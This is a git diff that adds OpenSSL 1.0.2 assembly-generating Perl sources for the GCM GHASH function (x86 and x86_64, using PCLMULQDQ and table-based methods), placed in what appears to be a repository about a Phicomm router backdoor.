+	&pclmulqdq	($Xhi,$Hkey,0x11);	#######
+	&pclmulqdq	($T1,$HK,0x00);		#######
+	&xorps		($T1,$Xi);		#
+	&xorps		($T1,$Xhi);		#
+
+	&movdqa		($T2,$T1);		#
+	&psrldq		($T1,8);
+	&pslldq		($T2,8);		#
+	&pxor		($Xhi,$T1);
+	&pxor		($Xi,$T2);		#
+}
+
+sub clmul64x64_T3 {
+# Even though this subroutine offers visually better ILP, it
+# was empirically found to be a tad slower than above version.
+# At least in gcm_ghash_clmul context. But it's just as well,
+# because loop modulo-scheduling is possible only thanks to
+# minimized "register" pressure...
+my ($Xhi,$Xi,$Hkey)=@_;
+
+	&movdqa		($T1,$Xi);		#
+	&movdqa		($Xhi,$Xi);
+	&pclmulqdq	($Xi,$Hkey,0x00);	#######
+	&pclmulqdq	($Xhi,$Hkey,0x11);	#######
+	&pshufd		($T2,$T1,0b01001110);	#
+	&pshufd		($T3,$Hkey,0b01001110);
+	&pxor		($T2,$T1);		#
+	&pxor		($T3,$Hkey);
+	&pclmulqdq	($T2,$T3,0x00);		#######
+	&pxor		($T2,$Xi);		#
+	&pxor		($T2,$Xhi);		#
+
+	&movdqa		($T3,$T2);		#
+	&psrldq		($T2,8);
+	&pslldq		($T3,8);		#
+	&pxor		($Xhi,$T2);
+	&pxor		($Xi,$T3);		#
+}
+
+if (1) {		# Algorithm 9 with <<1 twist.
+			# Reduction is shorter and uses only two
+			# temporary registers, which makes it better
+			# candidate for interleaving with 64x64
+			# multiplication. Pre-modulo-scheduled loop
+			# was found to be ~20% faster than Algorithm 5
+			# below. Algorithm 9 was therefore chosen for
+			# further optimization...
+
+sub reduction_alg9 {	# 17/11 times faster than Intel version
+my ($Xhi,$Xi) = @_;
+
+	# 1st phase
+	&movdqa		($T2,$Xi);		#
+	&movdqa		($T1,$Xi);
+	&psllq		($Xi,5);
+	&pxor		($T1,$Xi);		#
+	&psllq		($Xi,1);
+	&pxor		($Xi,$T1);		#
+	&psllq		($Xi,57);		#
+	&movdqa		($T1,$Xi);		#
+	&pslldq		($Xi,8);
+	&psrldq		($T1,8);		#	
+	&pxor		($Xi,$T2);
+	&pxor		($Xhi,$T1);		#
+
+	# 2nd phase
+	&movdqa		($T2,$Xi);
+	&psrlq		($Xi,1);
+	&pxor		($Xhi,$T2);		#
+	&pxor		($T2,$Xi);
+	&psrlq		($Xi,5);
+	&pxor		($Xi,$T2);		#
+	&psrlq		($Xi,1);		#
+	&pxor		($Xi,$Xhi)		#
+}
+
+&function_begin_B("gcm_init_clmul");
+	&mov		($Htbl,&wparam(0));
+	&mov		($Xip,&wparam(1));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Hkey,&QWP(0,$Xip));
+	&pshufd		($Hkey,$Hkey,0b01001110);# dword swap
+
+	# <<1 twist
+	&pshufd		($T2,$Hkey,0b11111111);	# broadcast uppermost dword
+	&movdqa		($T1,$Hkey);
+	&psllq		($Hkey,1);
+	&pxor		($T3,$T3);		#
+	&psrlq		($T1,63);
+	&pcmpgtd	($T3,$T2);		# broadcast carry bit
+	&pslldq		($T1,8);
+	&por		($Hkey,$T1);		# H<<=1
+
+	# magic reduction
+	&pand		($T3,&QWP(16,$const));	# 0x1c2_polynomial
+	&pxor		($Hkey,$T3);		# if(carry) H^=0x1c2_polynomial
+
+	# calculate H^2
+	&movdqa		($Xi,$Hkey);
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey);
+	&reduction_alg9	($Xhi,$Xi);
+
+	&pshufd		($T1,$Hkey,0b01001110);
+	&pshufd		($T2,$Xi,0b01001110);
+	&pxor		($T1,$Hkey);		# Karatsuba pre-processing
+	&movdqu		(&QWP(0,$Htbl),$Hkey);	# save H
+	&pxor		($T2,$Xi);		# Karatsuba pre-processing
+	&movdqu		(&QWP(16,$Htbl),$Xi);	# save H^2
+	&palignr	($T2,$T1,8);		# low part is H.lo^H.hi
+	&movdqu		(&QWP(32,$Htbl),$T2);	# save Karatsuba "salt"
+
+	&ret		();
+&function_end_B("gcm_init_clmul");
+
+&function_begin_B("gcm_gmult_clmul");
+	&mov		($Xip,&wparam(0));
+	&mov		($Htbl,&wparam(1));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Xi,&QWP(0,$Xip));
+	&movdqa		($T3,&QWP(0,$const));
+	&movups		($Hkey,&QWP(0,$Htbl));
+	&pshufb		($Xi,$T3);
+	&movups		($T2,&QWP(32,$Htbl));
+
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey,$T2);
+	&reduction_alg9	($Xhi,$Xi);
+
+	&pshufb		($Xi,$T3);
+	&movdqu		(&QWP(0,$Xip),$Xi);
+
+	&ret	();
+&function_end_B("gcm_gmult_clmul");
+
+&function_begin("gcm_ghash_clmul");
+	&mov		($Xip,&wparam(0));
+	&mov		($Htbl,&wparam(1));
+	&mov		($inp,&wparam(2));
+	&mov		($len,&wparam(3));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Xi,&QWP(0,$Xip));
+	&movdqa		($T3,&QWP(0,$const));
+	&movdqu		($Hkey,&QWP(0,$Htbl));
+	&pshufb		($Xi,$T3);
+
+	&sub		($len,0x10);
+	&jz		(&label("odd_tail"));
+
+	#######
+	# Xi+2 =[H*(Ii+1 + Xi+1)] mod P =
+	#	[(H*Ii+1) + (H*Xi+1)] mod P =
+	#	[(H*Ii+1) + H^2*(Ii+Xi)] mod P
+	#
+	&movdqu		($T1,&QWP(0,$inp));	# Ii
+	&movdqu		($Xn,&QWP(16,$inp));	# Ii+1
+	&pshufb		($T1,$T3);
+	&pshufb		($Xn,$T3);
+	&movdqu		($T3,&QWP(32,$Htbl));
+	&pxor		($Xi,$T1);		# Ii+Xi
+
+	&pshufd		($T1,$Xn,0b01001110);	# H*Ii+1
+	&movdqa		($Xhn,$Xn);
+	&pxor		($T1,$Xn);		#
+	&lea		($inp,&DWP(32,$inp));	# i+=2
+
+	&pclmulqdq	($Xn,$Hkey,0x00);	#######
+	&pclmulqdq	($Xhn,$Hkey,0x11);	#######
+	&pclmulqdq	($T1,$T3,0x00);		#######
+	&movups		($Hkey,&QWP(16,$Htbl));	# load H^2
+	&nop		();
+
+	&sub		($len,0x20);
+	&jbe		(&label("even_tail"));
+	&jmp		(&label("mod_loop"));
+
+&set_label("mod_loop",32);
+	&pshufd		($T2,$Xi,0b01001110);	# H^2*(Ii+Xi)
+	&movdqa		($Xhi,$Xi);
+	&pxor		($T2,$Xi);		#
+	&nop		();
+
+	&pclmulqdq	($Xi,$Hkey,0x00);	#######
+	&pclmulqdq	($Xhi,$Hkey,0x11);	#######
+	&pclmulqdq	($T2,$T3,0x10);		#######
+	&movups		($Hkey,&QWP(0,$Htbl));	# load H
+
+	&xorps		($Xi,$Xn);		# (H*Ii+1) + H^2*(Ii+Xi)
+	&movdqa		($T3,&QWP(0,$const));
+	&xorps		($Xhi,$Xhn);
+	 &movdqu	($Xhn,&QWP(0,$inp));	# Ii
+	&pxor		($T1,$Xi);		# aggregated Karatsuba post-processing
+	 &movdqu	($Xn,&QWP(16,$inp));	# Ii+1
+	&pxor		($T1,$Xhi);		#
+
+	 &pshufb	($Xhn,$T3);
+	&pxor		($T2,$T1);		#
+
+	&movdqa		($T1,$T2);		#
+	&psrldq		($T2,8);
+	&pslldq		($T1,8);		#
+	&pxor		($Xhi,$T2);
+	&pxor		($Xi,$T1);		#
+	 &pshufb	($Xn,$T3);
+	 &pxor		($Xhi,$Xhn);		# "Ii+Xi", consume early
+
+	&movdqa		($Xhn,$Xn);		#&clmul64x64_TX	($Xhn,$Xn,$Hkey); H*Ii+1
+	  &movdqa	($T2,$Xi);		#&reduction_alg9($Xhi,$Xi); 1st phase
+	  &movdqa	($T1,$Xi);
+	  &psllq	($Xi,5);
+	  &pxor		($T1,$Xi);		#
+	  &psllq	($Xi,1);
+	  &pxor		($Xi,$T1);		#
+	&pclmulqdq	($Xn,$Hkey,0x00);	#######
+	&movups		($T3,&QWP(32,$Htbl));
+	  &psllq	($Xi,57);		#
+	  &movdqa	($T1,$Xi);		#
+	  &pslldq	($Xi,8);
+	  &psrldq	($T1,8);		#	
+	  &pxor		($Xi,$T2);
+	  &pxor		($Xhi,$T1);		#
+	&pshufd		($T1,$Xhn,0b01001110);
+	  &movdqa	($T2,$Xi);		# 2nd phase
+	  &psrlq	($Xi,1);
+	&pxor		($T1,$Xhn);
+	  &pxor		($Xhi,$T2);		#
+	&pclmulqdq	($Xhn,$Hkey,0x11);	#######
+	&movups		($Hkey,&QWP(16,$Htbl));	# load H^2
+	  &pxor		($T2,$Xi);
+	  &psrlq	($Xi,5);
+	  &pxor		($Xi,$T2);		#
+	  &psrlq	($Xi,1);		#
+	  &pxor		($Xi,$Xhi)		#
+	&pclmulqdq	($T1,$T3,0x00);		#######
+
+	&lea		($inp,&DWP(32,$inp));
+	&sub		($len,0x20);
+	&ja		(&label("mod_loop"));
+
+&set_label("even_tail");
+	&pshufd		($T2,$Xi,0b01001110);	# H^2*(Ii+Xi)
+	&movdqa		($Xhi,$Xi);
+	&pxor		($T2,$Xi);		#
+
+	&pclmulqdq	($Xi,$Hkey,0x00);	#######
+	&pclmulqdq	($Xhi,$Hkey,0x11);	#######
+	&pclmulqdq	($T2,$T3,0x10);		#######
+	&movdqa		($T3,&QWP(0,$const));
+
+	&xorps		($Xi,$Xn);		# (H*Ii+1) + H^2*(Ii+Xi)
+	&xorps		($Xhi,$Xhn);
+	&pxor		($T1,$Xi);		# aggregated Karatsuba post-processing
+	&pxor		($T1,$Xhi);		#
+
+	&pxor		($T2,$T1);		#
+
+	&movdqa		($T1,$T2);		#
+	&psrldq		($T2,8);
+	&pslldq		($T1,8);		#
+	&pxor		($Xhi,$T2);
+	&pxor		($Xi,$T1);		#
+
+	&reduction_alg9	($Xhi,$Xi);
+
+	&test		($len,$len);
+	&jnz		(&label("done"));
+
+	&movups		($Hkey,&QWP(0,$Htbl));	# load H
+&set_label("odd_tail");
+	&movdqu		($T1,&QWP(0,$inp));	# Ii
+	&pshufb		($T1,$T3);
+	&pxor		($Xi,$T1);		# Ii+Xi
+
+	&clmul64x64_T2	($Xhi,$Xi,$Hkey);	# H*(Ii+Xi)
+	&reduction_alg9	($Xhi,$Xi);
+
+&set_label("done");
+	&pshufb		($Xi,$T3);
+	&movdqu		(&QWP(0,$Xip),$Xi);
+&function_end("gcm_ghash_clmul");
+
+} else {		# Algorith 5. Kept for reference purposes.
+
+sub reduction_alg5 {	# 19/16 times faster than Intel version
+my ($Xhi,$Xi)=@_;
+
+	# <<1
+	&movdqa		($T1,$Xi);		#
+	&movdqa		($T2,$Xhi);
+	&pslld		($Xi,1);
+	&pslld		($Xhi,1);		#
+	&psrld		($T1,31);
+	&psrld		($T2,31);		#
+	&movdqa		($T3,$T1);
+	&pslldq		($T1,4);
+	&psrldq		($T3,12);		#
+	&pslldq		($T2,4);
+	&por		($Xhi,$T3);		#
+	&por		($Xi,$T1);
+	&por		($Xhi,$T2);		#
+
+	# 1st phase
+	&movdqa		($T1,$Xi);
+	&movdqa		($T2,$Xi);
+	&movdqa		($T3,$Xi);		#
+	&pslld		($T1,31);
+	&pslld		($T2,30);
+	&pslld		($Xi,25);		#
+	&pxor		($T1,$T2);
+	&pxor		($T1,$Xi);		#
+	&movdqa		($T2,$T1);		#
+	&pslldq		($T1,12);
+	&psrldq		($T2,4);		#
+	&pxor		($T3,$T1);
+
+	# 2nd phase
+	&pxor		($Xhi,$T3);		#
+	&movdqa		($Xi,$T3);
+	&movdqa		($T1,$T3);
+	&psrld		($Xi,1);		#
+	&psrld		($T1,2);
+	&psrld		($T3,7);		#
+	&pxor		($Xi,$T1);
+	&pxor		($Xhi,$T2);
+	&pxor		($Xi,$T3);		#
+	&pxor		($Xi,$Xhi);		#
+}
+
+&function_begin_B("gcm_init_clmul");
+	&mov		($Htbl,&wparam(0));
+	&mov		($Xip,&wparam(1));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Hkey,&QWP(0,$Xip));
+	&pshufd		($Hkey,$Hkey,0b01001110);# dword swap
+
+	# calculate H^2
+	&movdqa		($Xi,$Hkey);
+	&clmul64x64_T3	($Xhi,$Xi,$Hkey);
+	&reduction_alg5	($Xhi,$Xi);
+
+	&movdqu		(&QWP(0,$Htbl),$Hkey);	# save H
+	&movdqu		(&QWP(16,$Htbl),$Xi);	# save H^2
+
+	&ret		();
+&function_end_B("gcm_init_clmul");
+
+&function_begin_B("gcm_gmult_clmul");
+	&mov		($Xip,&wparam(0));
+	&mov		($Htbl,&wparam(1));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Xi,&QWP(0,$Xip));
+	&movdqa		($Xn,&QWP(0,$const));
+	&movdqu		($Hkey,&QWP(0,$Htbl));
+	&pshufb		($Xi,$Xn);
+
+	&clmul64x64_T3	($Xhi,$Xi,$Hkey);
+	&reduction_alg5	($Xhi,$Xi);
+
+	&pshufb		($Xi,$Xn);
+	&movdqu		(&QWP(0,$Xip),$Xi);
+
+	&ret	();
+&function_end_B("gcm_gmult_clmul");
+
+&function_begin("gcm_ghash_clmul");
+	&mov		($Xip,&wparam(0));
+	&mov		($Htbl,&wparam(1));
+	&mov		($inp,&wparam(2));
+	&mov		($len,&wparam(3));
+
+	&call		(&label("pic"));
+&set_label("pic");
+	&blindpop	($const);
+	&lea		($const,&DWP(&label("bswap")."-".&label("pic"),$const));
+
+	&movdqu		($Xi,&QWP(0,$Xip));
+	&movdqa		($T3,&QWP(0,$const));
+	&movdqu		($Hkey,&QWP(0,$Htbl));
+	&pshufb		($Xi,$T3);
+
+	&sub		($len,0x10);
+	&jz		(&label("odd_tail"));
+
+	#######
+	# Xi+2 =[H*(Ii+1 + Xi+1)] mod P =
+	#	[(H*Ii+1) + (H*Xi+1)] mod P =
+	#	[(H*Ii+1) + H^2*(Ii+Xi)] mod P
+	#
+	&movdqu		($T1,&QWP(0,$inp));	# Ii
+	&movdqu		($Xn,&QWP(16,$inp));	# Ii+1
+	&pshufb		($T1,$T3);
+	&pshufb		($Xn,$T3);
+	&pxor		($Xi,$T1);		# Ii+Xi
+
+	&clmul64x64_T3	($Xhn,$Xn,$Hkey);	# H*Ii+1
+	&movdqu		($Hkey,&QWP(16,$Htbl));	# load H^2
+
+	&sub		($len,0x20);
+	&lea		($inp,&DWP(32,$inp));	# i+=2
+	&jbe		(&label("even_tail"));
+
+&set_label("mod_loop");
+	&clmul64x64_T3	($Xhi,$Xi,$Hkey);	# H^2*(Ii+Xi)
+	&movdqu		($Hkey,&QWP(0,$Htbl));	# load H
+
+	&pxor		($Xi,$Xn);		# (H*Ii+1) + H^2*(Ii+Xi)
+	&pxor		($Xhi,$Xhn);
+
+	&reduction_alg5	($Xhi,$Xi);
+
+	#######
+	&movdqa		($T3,&QWP(0,$const));
+	&movdqu		($T1,&QWP(0,$inp));	# Ii
+	&movdqu		($Xn,&QWP(16,$inp));	# Ii+1
+	&pshufb		($T1,$T3);
+	&pshufb		($Xn,$T3);
+	&pxor		($Xi,$T1);		# Ii+Xi
+
+	&clmul64x64_T3	($Xhn,$Xn,$Hkey);	# H*Ii+1
+	&movdqu		($Hkey,&QWP(16,$Htbl));	# load H^2
+
+	&sub		($len,0x20);
+	&lea		($inp,&DWP(32,$inp));
+	&ja		(&label("mod_loop"));
+
+&set_label("even_tail");
+	&clmul64x64_T3	($Xhi,$Xi,$Hkey);	# H^2*(Ii+Xi)
+
+	&pxor		($Xi,$Xn);		# (H*Ii+1) + H^2*(Ii+Xi)
+	&pxor		($Xhi,$Xhn);
+
+	&reduction_alg5	($Xhi,$Xi);
+
+	&movdqa		($T3,&QWP(0,$const));
+	&test		($len,$len);
+	&jnz		(&label("done"));
+
+	&movdqu		($Hkey,&QWP(0,$Htbl));	# load H
+&set_label("odd_tail");
+	&movdqu		($T1,&QWP(0,$inp));	# Ii
+	&pshufb		($T1,$T3);
+	&pxor		($Xi,$T1);		# Ii+Xi
+
+	&clmul64x64_T3	($Xhi,$Xi,$Hkey);	# H*(Ii+Xi)
+	&reduction_alg5	($Xhi,$Xi);
+
+	&movdqa		($T3,&QWP(0,$const));
+&set_label("done");
+	&pshufb		($Xi,$T3);
+	&movdqu		(&QWP(0,$Xip),$Xi);
+&function_end("gcm_ghash_clmul");
+
+}
+
+&set_label("bswap",64);
+	&data_byte(15,14,13,12,11,10,9,8,7,6,5,4,3,2,1,0);
+	&data_byte(1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0xc2);	# 0x1c2_polynomial
+&set_label("rem_8bit",64);
+	&data_short(0x0000,0x01C2,0x0384,0x0246,0x0708,0x06CA,0x048C,0x054E);
+	&data_short(0x0E10,0x0FD2,0x0D94,0x0C56,0x0918,0x08DA,0x0A9C,0x0B5E);
+	&data_short(0x1C20,0x1DE2,0x1FA4,0x1E66,0x1B28,0x1AEA,0x18AC,0x196E);
+	&data_short(0x1230,0x13F2,0x11B4,0x1076,0x1538,0x14FA,0x16BC,0x177E);
+	&data_short(0x3840,0x3982,0x3BC4,0x3A06,0x3F48,0x3E8A,0x3CCC,0x3D0E);
+	&data_short(0x3650,0x3792,0x35D4,0x3416,0x3158,0x309A,0x32DC,0x331E);
+	&data_short(0x2460,0x25A2,0x27E4,0x2626,0x2368,0x22AA,0x20EC,0x212E);
+	&data_short(0x2A70,0x2BB2,0x29F4,0x2836,0x2D78,0x2CBA,0x2EFC,0x2F3E);
+	&data_short(0x7080,0x7142,0x7304,0x72C6,0x7788,0x764A,0x740C,0x75CE);
+	&data_short(0x7E90,0x7F52,0x7D14,0x7CD6,0x7998,0x785A,0x7A1C,0x7BDE);
+	&data_short(0x6CA0,0x6D62,0x6F24,0x6EE6,0x6BA8,0x6A6A,0x682C,0x69EE);
+	&data_short(0x62B0,0x6372,0x6134,0x60F6,0x65B8,0x647A,0x663C,0x67FE);
+	&data_short(0x48C0,0x4902,0x4B44,0x4A86,0x4FC8,0x4E0A,0x4C4C,0x4D8E);
+	&data_short(0x46D0,0x4712,0x4554,0x4496,0x41D8,0x401A,0x425C,0x439E);
+	&data_short(0x54E0,0x5522,0x5764,0x56A6,0x53E8,0x522A,0x506C,0x51AE);
+	&data_short(0x5AF0,0x5B32,0x5974,0x58B6,0x5DF8,0x5C3A,0x5E7C,0x5FBE);
+	&data_short(0xE100,0xE0C2,0xE284,0xE346,0xE608,0xE7CA,0xE58C,0xE44E);
+	&data_short(0xEF10,0xEED2,0xEC94,0xED56,0xE818,0xE9DA,0xEB9C,0xEA5E);
+	&data_short(0xFD20,0xFCE2,0xFEA4,0xFF66,0xFA28,0xFBEA,0xF9AC,0xF86E);
+	&data_short(0xF330,0xF2F2,0xF0B4,0xF176,0xF438,0xF5FA,0xF7BC,0xF67E);
+	&data_short(0xD940,0xD882,0xDAC4,0xDB06,0xDE48,0xDF8A,0xDDCC,0xDC0E);
+	&data_short(0xD750,0xD692,0xD4D4,0xD516,0xD058,0xD19A,0xD3DC,0xD21E);
+	&data_short(0xC560,0xC4A2,0xC6E4,0xC726,0xC268,0xC3AA,0xC1EC,0xC02E);
+	&data_short(0xCB70,0xCAB2,0xC8F4,0xC936,0xCC78,0xCDBA,0xCFFC,0xCE3E);
+	&data_short(0x9180,0x9042,0x9204,0x93C6,0x9688,0x974A,0x950C,0x94CE);
+	&data_short(0x9F90,0x9E52,0x9C14,0x9DD6,0x9898,0x995A,0x9B1C,0x9ADE);
+	&data_short(0x8DA0,0x8C62,0x8E24,0x8FE6,0x8AA8,0x8B6A,0x892C,0x88EE);
+	&data_short(0x83B0,0x8272,0x8034,0x81F6,0x84B8,0x857A,0x873C,0x86FE);
+	&data_short(0xA9C0,0xA802,0xAA44,0xAB86,0xAEC8,0xAF0A,0xAD4C,0xAC8E);
+	&data_short(0xA7D0,0xA612,0xA454,0xA596,0xA0D8,0xA11A,0xA35C,0xA29E);
+	&data_short(0xB5E0,0xB422,0xB664,0xB7A6,0xB2E8,0xB32A,0xB16C,0xB0AE);
+	&data_short(0xBBF0,0xBA32,0xB874,0xB9B6,0xBCF8,0xBD3A,0xBF7C,0xBEBE);
+}}	# $sse2
+
+&set_label("rem_4bit",64);
+	&data_word(0,0x0000<<$S,0,0x1C20<<$S,0,0x3840<<$S,0,0x2460<<$S);
+	&data_word(0,0x7080<<$S,0,0x6CA0<<$S,0,0x48C0<<$S,0,0x54E0<<$S);
+	&data_word(0,0xE100<<$S,0,0xFD20<<$S,0,0xD940<<$S,0,0xC560<<$S);
+	&data_word(0,0x9180<<$S,0,0x8DA0<<$S,0,0xA9C0<<$S,0,0xB5E0<<$S);
+}}}	# !$x86only
+
+&asciz("GHASH for x86, CRYPTOGAMS by <appro\@openssl.org>");
+&asm_finish();
+
+# A question was risen about choice of vanilla MMX. Or rather why wasn't
+# SSE2 chosen instead? In addition to the fact that MMX runs on legacy
+# CPUs such as PIII, "4-bit" MMX version was observed to provide better
+# performance than *corresponding* SSE2 one even on contemporary CPUs.
+# SSE2 results were provided by Peter-Michael Hager. He maintains SSE2
+# implementation featuring full range of lookup-table sizes, but with
+# per-invocation lookup table setup. Latter means that table size is
+# chosen depending on how much data is to be hashed in every given call,
+# more data - larger table. Best reported result for Core2 is ~4 cycles
+# per processed byte out of 64KB block. This number accounts even for
+# 64KB table setup overhead. As discussed in gcm128.c we choose to be
+# more conservative in respect to lookup table sizes, but how do the
+# results compare? Minimalistic "256B" MMX version delivers ~11 cycles
+# on same platform. As also discussed in gcm128.c, next in line "8-bit
+# Shoup's" or "4KB" method should deliver twice the performance of
+# "256B" one, in other words not worse than ~6 cycles per byte. It
+# should be also be noted that in SSE2 case improvement can be "super-
+# linear," i.e. more than twice, mostly because >>8 maps to single
+# instruction on SSE2 register. This is unlike "4-bit" case when >>4
+# maps to same amount of instructions in both MMX and SSE2 cases.
+# Bottom line is that switch to SSE2 is considered to be justifiable
+# only in case we choose to implement "8-bit" method...
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86_64.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86_64.pl
new file mode 100644
index 0000000..6e656ca
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/modes/asm/ghash-x86_64.pl
@@ -0,0 +1,1753 @@
+#!/usr/bin/env perl
+#
+# ====================================================================
+# Written by Andy Polyakov <appro@openssl.org> for the OpenSSL
+# project. The module is, however, dual licensed under OpenSSL and
+# CRYPTOGAMS licenses depending on where you obtain it. For further
+# details see http://www.openssl.org/~appro/cryptogams/.
+# ====================================================================
+#
+# March, June 2010
+#
+# The module implements "4-bit" GCM GHASH function and underlying
+# single multiplication operation in GF(2^128). "4-bit" means that
+# it uses 256 bytes per-key table [+128 bytes shared table]. GHASH
+# function features so called "528B" variant utilizing additional
+# 256+16 bytes of per-key storage [+512 bytes shared table].
+# Performance results are for this streamed GHASH subroutine and are
+# expressed in cycles per processed byte, less is better:
+#
+#		gcc 3.4.x(*)	assembler
+#
+# P4		28.6		14.0		+100%
+# Opteron	19.3		7.7		+150%
+# Core2		17.8		8.1(**)		+120%
+# Atom		31.6		16.8		+88%
+# VIA Nano	21.8		10.1		+115%
+#
+# (*)	comparison is not completely fair, because C results are
+#	for vanilla "256B" implementation, while assembler results
+#	are for "528B";-)
+# (**)	it's mystery [to me] why Core2 result is not same as for
+#	Opteron;
+
+# May 2010
+#
+# Add PCLMULQDQ version performing at 2.02 cycles per processed byte.
+# See ghash-x86.pl for background information and details about coding
+# techniques.
+#
+# Special thanks to David Woodhouse <dwmw2@infradead.org> for
+# providing access to a Westmere-based system on behalf of Intel
+# Open Source Technology Centre.
+
+# December 2012
+#
+# Overhaul: aggregate Karatsuba post-processing, improve ILP in
+# reduction_alg9, increase reduction aggregate factor to 4x. As for
+# the latter. ghash-x86.pl discusses that it makes lesser sense to
+# increase aggregate factor. Then why increase here? Critical path
+# consists of 3 independent pclmulqdq instructions, Karatsuba post-
+# processing and reduction. "On top" of this we lay down aggregated
+# multiplication operations, triplets of independent pclmulqdq's. As
+# issue rate for pclmulqdq is limited, it makes lesser sense to
+# aggregate more multiplications than it takes to perform remaining
+# non-multiplication operations. 2x is near-optimal coefficient for
+# contemporary Intel CPUs (therefore modest improvement coefficient),
+# but not for Bulldozer. Latter is because logical SIMD operations
+# are twice as slow in comparison to Intel, so that critical path is
+# longer. A CPU with higher pclmulqdq issue rate would also benefit
+# from higher aggregate factor...
+#
+# Westmere	1.78(+13%)
+# Sandy Bridge	1.80(+8%)
+# Ivy Bridge	1.80(+7%)
+# Haswell	0.55(+93%) (if system doesn't support AVX)
+# Broadwell	0.45(+110%)(if system doesn't support AVX)
+# Bulldozer	1.49(+27%)
+# Silvermont	2.88(+13%)
+
+# March 2013
+#
+# ... 8x aggregate factor AVX code path is using reduction algorithm
+# suggested by Shay Gueron[1]. Even though contemporary AVX-capable
+# CPUs such as Sandy and Ivy Bridge can execute it, the code performs
+# sub-optimally in comparison to above mentioned version. But thanks
+# to Ilya Albrekht and Max Locktyukhin of Intel Corp. we knew that
+# it performs in 0.41 cycles per byte on Haswell processor, and in
+# 0.29 on Broadwell.
+#
+# [1] http://rt.openssl.org/Ticket/Display.html?id=2900&user=guest&pass=guest
+
+$flavour = shift;
+$output  = shift;
+if ($flavour =~ /\./) { $output = $flavour; undef $flavour; }
+
+$win64=0; $win64=1 if ($flavour =~ /[nm]asm|mingw64/ || $output =~ /\.asm$/);
+
+$0 =~ m/(.*[\/\\])[^\/\\]+$/; $dir=$1;
+( $xlate="${dir}x86_64-xlate.pl" and -f $xlate ) or
+( $xlate="${dir}../../perlasm/x86_64-xlate.pl" and -f $xlate) or
+die "can't locate x86_64-xlate.pl";
+
+if (`$ENV{CC} -Wa,-v -c -o /dev/null -x assembler /dev/null 2>&1`
+		=~ /GNU assembler version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.19) + ($1>=2.22);
+}
+
+if (!$avx && $win64 && ($flavour =~ /nasm/ || $ENV{ASM} =~ /nasm/) &&
+	    `nasm -v 2>&1` =~ /NASM version ([2-9]\.[0-9]+)/) {
+	$avx = ($1>=2.09) + ($1>=2.10);
+}
+
+if (!$avx && $win64 && ($flavour =~ /masm/ || $ENV{ASM} =~ /ml64/) &&
+	    `ml64 2>&1` =~ /Version ([0-9]+)\./) {
+	$avx = ($1>=10) + ($1>=11);
+}
+
+if (!$avx && `$ENV{CC} -v 2>&1` =~ /(^clang version|based on LLVM) ([3-9]\.[0-9]+)/) {
+	$avx = ($2>=3.0) + ($2>3.0);
+}
+
+open OUT,"| \"$^X\" $xlate $flavour $output";
+*STDOUT=*OUT;
+
+$do4xaggr=1;
+
+# common register layout
+$nlo="%rax";
+$nhi="%rbx";
+$Zlo="%r8";
+$Zhi="%r9";
+$tmp="%r10";
+$rem_4bit = "%r11";
+
+$Xi="%rdi";
+$Htbl="%rsi";
+
+# per-function register layout
+$cnt="%rcx";
+$rem="%rdx";
+
+sub LB() { my $r=shift; $r =~ s/%[er]([a-d])x/%\1l/	or
+			$r =~ s/%[er]([sd]i)/%\1l/	or
+			$r =~ s/%[er](bp)/%\1l/		or
+			$r =~ s/%(r[0-9]+)[d]?/%\1b/;   $r; }
+
+sub AUTOLOAD()		# thunk [simplified] 32-bit style perlasm
+{ my $opcode = $AUTOLOAD; $opcode =~ s/.*:://;
+  my $arg = pop;
+    $arg = "\$$arg" if ($arg*1 eq $arg);
+    $code .= "\t$opcode\t".join(',',$arg,reverse @_)."\n";
+}
+
+{ my $N;
+  sub loop() {
+  my $inp = shift;
+
+	$N++;
+$code.=<<___;
+	xor	$nlo,$nlo
+	xor	$nhi,$nhi
+	mov	`&LB("$Zlo")`,`&LB("$nlo")`
+	mov	`&LB("$Zlo")`,`&LB("$nhi")`
+	shl	\$4,`&LB("$nlo")`
+	mov	\$14,$cnt
+	mov	8($Htbl,$nlo),$Zlo
+	mov	($Htbl,$nlo),$Zhi
+	and	\$0xf0,`&LB("$nhi")`
+	mov	$Zlo,$rem
+	jmp	.Loop$N
+
+.align	16
+.Loop$N:
+	shr	\$4,$Zlo
+	and	\$0xf,$rem
+	mov	$Zhi,$tmp
+	mov	($inp,$cnt),`&LB("$nlo")`
+	shr	\$4,$Zhi
+	xor	8($Htbl,$nhi),$Zlo
+	shl	\$60,$tmp
+	xor	($Htbl,$nhi),$Zhi
+	mov	`&LB("$nlo")`,`&LB("$nhi")`
+	xor	($rem_4bit,$rem,8),$Zhi
+	mov	$Zlo,$rem
+	shl	\$4,`&LB("$nlo")`
+	xor	$tmp,$Zlo
+	dec	$cnt
+	js	.Lbreak$N
+
+	shr	\$4,$Zlo
+	and	\$0xf,$rem
+	mov	$Zhi,$tmp
+	shr	\$4,$Zhi
+	xor	8($Htbl,$nlo),$Zlo
+	shl	\$60,$tmp
+	xor	($Htbl,$nlo),$Zhi
+	and	\$0xf0,`&LB("$nhi")`
+	xor	($rem_4bit,$rem,8),$Zhi
+	mov	$Zlo,$rem
+	xor	$tmp,$Zlo
+	jmp	.Loop$N
+
+.align	16
+.Lbreak$N:
+	shr	\$4,$Zlo
+	and	\$0xf,$rem
